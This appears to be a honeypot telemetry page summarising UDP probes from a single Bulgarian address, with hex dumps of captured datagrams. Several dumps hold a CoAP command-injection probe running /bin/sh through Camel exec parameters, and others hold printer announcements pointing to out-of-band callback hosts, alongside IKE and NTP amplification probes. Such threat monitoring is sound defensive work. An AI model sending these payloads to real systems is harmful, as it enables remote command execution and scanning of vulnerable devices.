UDP traffic
Datagrams matching asn:48090 sent to HoneyLabs sensors over UDP in the last 7 days. DNS questions and QUIC client fingerprints are decoded on the sensor. Other datagrams are kept as their first bytes and labelled by protocol where it can be recognised.
A UDP source address can be forged, so each address listed here either sent the traffic or was impersonated by whoever did. UDP traffic is kept out of verdicts, feeds, watchlists and alerts.
13
Datagrams
1
Source addresses
1
Networks
1
Countries
4
Destination ports
Traffic by type
Service queries
8 datagrams from 1 sourceRequests a service answers without a handshake. Scanners send them to find open DNS, NTP, SNMP or SSDP servers, which are also the servers reflection attacks abuse.
Latest CoAP datagram, to 5683/udp
payload bytes
00000000 44 02 b2 26 63 c0 e1 1d b4 65 78 65 63 11 00 3d |D..&c....exec..=| 00000010 15 43 61 6d 65 6c 45 78 65 63 43 6f 6d 6d 61 6e |.CamelExecComman| 00000020 64 45 78 65 63 75 74 61 62 6c 65 3d 2f 62 69 6e |dExecutable=/bin| 00000030 2f 73 68 0d 26 43 61 6d 65 6c 45 78 65 63 43 6f |/sh.&CamelExecCo| 00000040 6d 6d 61 6e 64 41 72 67 73 3d 2d 63 20 27 65 63 |mmandArgs=-c 'ec| 00000050 68 6f 20 43 56 45 32 30 32 36 33 33 34 35 33 61 |ho CVE202633453a| 00000060 6c 62 69 69 73 72 74 27 ff 70 72 6f 62 65 |lbiisrt'.probe|
Unrecognised
5 datagrams from 1 sourceDatagrams no decoder recognised. Their first bytes are kept.
Latest Unrecognised datagram, to 500/udp
payload bytes
00000000 d7 15 cc 4a 91 7d 53 3b 00 00 00 00 00 00 00 00 |...J.}S;........| 00000010 01 10 02 00 00 00 00 00 00 00 00 64 0d 00 00 30 |...........d...0| 00000020 00 00 00 01 00 00 00 01 00 00 00 24 01 01 00 01 |...........$....| 00000030 00 00 00 1c 01 01 00 00 80 01 00 07 80 0e 01 00 |................| 00000040 80 02 00 02 80 03 00 03 80 04 00 02 00 00 00 18 |................| 00000050 3c f1 87 b2 47 40 29 ea 46 ac 7f d0 ea f2 89 f5 |<...G@).F.......| 00000060 00 00 00 04 |....|
Amplification checks
Probes for services that answer a small request with a much larger reply, the property reflection attacks rely on.
| Service | Port | Datagrams | Sources | Factor |
|---|---|---|---|---|
| NTP | 123/udp | 3 | 1 | 556.9 |
The factor is how many bytes a reachable server can send back for each byte it receives, as published by CISA in alert TA14-017A.
Source addresses (unverified)
| Address | Network | Cc | Sends | Datagrams | Last seen (UTC) |
|---|---|---|---|---|---|
| 93.123.109.214 | AS48090 Techoff Srv Limited | BG | CoAP | 13 | 2026-10-10 18:23 |
Latest datagrams
payload bytes
00000000 44 02 b2 26 63 c0 e1 1d b4 65 78 65 63 11 00 3d |D..&c....exec..=| 00000010 15 43 61 6d 65 6c 45 78 65 63 43 6f 6d 6d 61 6e |.CamelExecComman| 00000020 64 45 78 65 63 75 74 61 62 6c 65 3d 2f 62 69 6e |dExecutable=/bin| 00000030 2f 73 68 0d 26 43 61 6d 65 6c 45 78 65 63 43 6f |/sh.&CamelExecCo| 00000040 6d 6d 61 6e 64 41 72 67 73 3d 2d 63 20 27 65 63 |mmandArgs=-c 'ec| 00000050 68 6f 20 43 56 45 32 30 32 36 33 33 34 35 33 61 |ho CVE202633453a| 00000060 6c 62 69 69 73 72 74 27 ff 70 72 6f 62 65 |lbiisrt'.probe|
payload bytes
00000000 d7 15 cc 4a 91 7d 53 3b 00 00 00 00 00 00 00 00 |...J.}S;........| 00000010 01 10 02 00 00 00 00 00 00 00 00 64 0d 00 00 30 |...........d...0| 00000020 00 00 00 01 00 00 00 01 00 00 00 24 01 01 00 01 |...........$....| 00000030 00 00 00 1c 01 01 00 00 80 01 00 07 80 0e 01 00 |................| 00000040 80 02 00 02 80 03 00 03 80 04 00 02 00 00 00 18 |................| 00000050 3c f1 87 b2 47 40 29 ea 46 ac 7f d0 ea f2 89 f5 |<...G@).F.......| 00000060 00 00 00 04 |....|
payload bytes
00000000 44 02 24 c0 70 85 e6 ec b4 65 78 65 63 11 00 3d |D.$.p....exec..=| 00000010 15 43 61 6d 65 6c 45 78 65 63 43 6f 6d 6d 61 6e |.CamelExecComman| 00000020 64 45 78 65 63 75 74 61 62 6c 65 3d 2f 62 69 6e |dExecutable=/bin| 00000030 2f 73 68 0d 26 43 61 6d 65 6c 45 78 65 63 43 6f |/sh.&CamelExecCo| 00000040 6d 6d 61 6e 64 41 72 67 73 3d 2d 63 20 27 65 63 |mmandArgs=-c 'ec| 00000050 68 6f 20 43 56 45 32 30 32 36 33 33 34 35 33 77 |ho CVE202633453w| 00000060 67 6d 62 67 73 66 77 27 ff 70 72 6f 62 65 |gmbgsfw'.probe|
payload bytes
00000000 16 02 03 e8 00 00 00 00 00 00 00 00 |............|
payload bytes
00000000 44 02 84 18 a5 e3 30 c6 b4 65 78 65 63 11 00 3d |D.....0..exec..=| 00000010 15 43 61 6d 65 6c 45 78 65 63 43 6f 6d 6d 61 6e |.CamelExecComman| 00000020 64 45 78 65 63 75 74 61 62 6c 65 3d 2f 62 69 6e |dExecutable=/bin| 00000030 2f 73 68 0d 26 43 61 6d 65 6c 45 78 65 63 43 6f |/sh.&CamelExecCo| 00000040 6d 6d 61 6e 64 41 72 67 73 3d 2d 63 20 27 65 63 |mmandArgs=-c 'ec| 00000050 68 6f 20 43 56 45 32 30 32 36 33 33 34 35 33 71 |ho CVE202633453q| 00000060 69 71 71 72 6d 77 6a 27 ff 70 72 6f 62 65 |iqqrmwj'.probe|
payload bytes
00000000 30 30 20 30 33 20 68 74 74 70 3a 2f 2f 64 62 33 |00 03 http://db3| 00000010 6e 72 6c 35 72 34 62 6f 6e 67 39 75 68 73 6c 6f |nrl5r4bong9uhslo| 00000020 67 62 64 6f 78 35 39 39 7a 6e 63 6f 74 39 2e 6f |gbdox599zncot9.o| 00000030 61 73 74 2e 6c 69 76 65 2f 70 72 69 6e 74 65 72 |ast.live/printer| 00000040 73 2f 56 75 6c 6e 50 72 69 6e 74 65 72 20 22 4f |s/VulnPrinter "O| 00000050 66 66 69 63 65 20 48 51 22 20 22 56 75 6c 6e 65 |ffice HQ" "Vulne| 00000060 72 61 62 6c 65 20 50 72 69 6e 74 65 72 22 |rable Printer"|
payload bytes
00000000 44 02 65 bc 63 8a 5a f5 b4 65 78 65 63 11 00 3d |D.e.c.Z..exec..=| 00000010 15 43 61 6d 65 6c 45 78 65 63 43 6f 6d 6d 61 6e |.CamelExecComman| 00000020 64 45 78 65 63 75 74 61 62 6c 65 3d 2f 62 69 6e |dExecutable=/bin| 00000030 2f 73 68 0d 26 43 61 6d 65 6c 45 78 65 63 43 6f |/sh.&CamelExecCo| 00000040 6d 6d 61 6e 64 41 72 67 73 3d 2d 63 20 27 65 63 |mmandArgs=-c 'ec| 00000050 68 6f 20 43 56 45 32 30 32 36 33 33 34 35 33 79 |ho CVE202633453y| 00000060 68 73 63 75 6e 6b 6d 27 ff 70 72 6f 62 65 |hscunkm'.probe|
payload bytes
00000000 30 30 20 30 33 20 68 74 74 70 3a 2f 2f 64 62 33 |00 03 http://db3| 00000010 30 72 69 74 72 34 62 6f 6d 6f 69 75 76 37 61 34 |0ritr4bomoiuv7a4| 00000020 67 64 6d 78 67 38 36 6f 36 36 39 36 66 39 2e 6f |gdmxg86o6696f9.o| 00000030 61 73 74 2e 6d 65 2f 70 72 69 6e 74 65 72 73 2f |ast.me/printers/| 00000040 56 75 6c 6e 50 72 69 6e 74 65 72 20 22 4f 66 66 |VulnPrinter "Off| 00000050 69 63 65 20 48 51 22 20 22 56 75 6c 6e 65 72 61 |ice HQ" "Vulnera| 00000060 62 6c 65 20 50 72 69 6e 74 65 72 22 |ble Printer"|
payload bytes
00000000 16 02 03 e8 00 00 00 00 00 00 00 00 |............|
payload bytes
00000000 60 f2 0d 64 c7 74 b8 a6 00 00 00 00 00 00 00 00 |`..d.t..........| 00000010 01 10 02 00 00 00 00 00 00 00 00 64 0d 00 00 30 |...........d...0| 00000020 00 00 00 01 00 00 00 01 00 00 00 24 01 01 00 01 |...........$....| 00000030 00 00 00 1c 01 01 00 00 80 01 00 07 80 0e 01 00 |................| 00000040 80 02 00 02 80 03 00 03 80 04 00 02 00 00 00 18 |................| 00000050 3c f1 87 b2 47 40 29 ea 46 ac 7f d0 ea f2 89 f5 |<...G@).F.......| 00000060 00 00 00 04 |....|
payload bytes
00000000 44 02 51 f4 26 81 a1 46 b4 65 78 65 63 11 00 3d |D.Q.&..F.exec..=| 00000010 15 43 61 6d 65 6c 45 78 65 63 43 6f 6d 6d 61 6e |.CamelExecComman| 00000020 64 45 78 65 63 75 74 61 62 6c 65 3d 2f 62 69 6e |dExecutable=/bin| 00000030 2f 73 68 0d 26 43 61 6d 65 6c 45 78 65 63 43 6f |/sh.&CamelExecCo| 00000040 6d 6d 61 6e 64 41 72 67 73 3d 2d 63 20 27 65 63 |mmandArgs=-c 'ec| 00000050 68 6f 20 43 56 45 32 30 32 36 33 33 34 35 33 68 |ho CVE202633453h| 00000060 78 75 77 64 75 61 67 27 ff 70 72 6f 62 65 |xuwduag'.probe|
payload bytes
00000000 30 30 20 30 33 20 68 74 74 70 3a 2f 2f 64 62 32 |00 03 http://db2| 00000010 39 67 33 74 72 34 62 6f 6e 66 70 39 67 6f 6c 31 |9g3tr4bonfp9gol1| 00000020 67 36 78 38 71 74 34 78 70 74 73 66 71 77 2e 6f |g6x8qt4xptsfqw.o| 00000030 61 73 74 2e 73 69 74 65 2f 70 72 69 6e 74 65 72 |ast.site/printer| 00000040 73 2f 56 75 6c 6e 50 72 69 6e 74 65 72 20 22 4f |s/VulnPrinter "O| 00000050 66 66 69 63 65 20 48 51 22 20 22 56 75 6c 6e 65 |ffice HQ" "Vulne| 00000060 72 61 62 6c 65 20 50 72 69 6e 74 65 72 22 |rable Printer"|
payload bytes
00000000 16 02 03 e8 00 00 00 00 00 00 00 00 |............|